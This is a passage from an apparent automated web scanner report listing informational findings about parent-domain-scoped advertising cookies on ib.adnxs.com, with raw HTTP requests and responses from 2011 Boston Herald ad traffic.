Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:57:57 GMT
Content-Length: 522

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61525102_1296251877,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-c
...[SNIP]...

10.92. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-31727353_1296259318%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D604786%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb781784=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb461348=5_[r^208WMM2x@N!@@-##ICj)?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP-ZzLIcOH5QUBWHfHSmrEELIcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA5gUBAgUCAAUAAAAAASKOJgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265416%29%3Buf%28%27r%27%2C+116344%2C+1296265416%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:43:36 GMT
Content-Length: 826

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-31727353_1296259318,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.93. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:57:44 GMT
Content-Length: 664

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.spo
...[SNIP]...

10.94. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-256627_1296258325%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D357355%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb780011=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb521874=5_[r^208WMM2x@N!@@-#!0*E$?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP-6NVCCYA2IZBWHfHSmrEELEcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAAhwQBAgUCAAUAAAAAwSGHKgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265412%29%3Buf%28%27r%27%2C+116344%2C+1296265412%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:43:32 GMT
Content-Length: 824

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-256627_1296258325,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de
...[SNIP]...

10.95. http://ib.adnxs.com/ttj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=0.14057195745408535 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%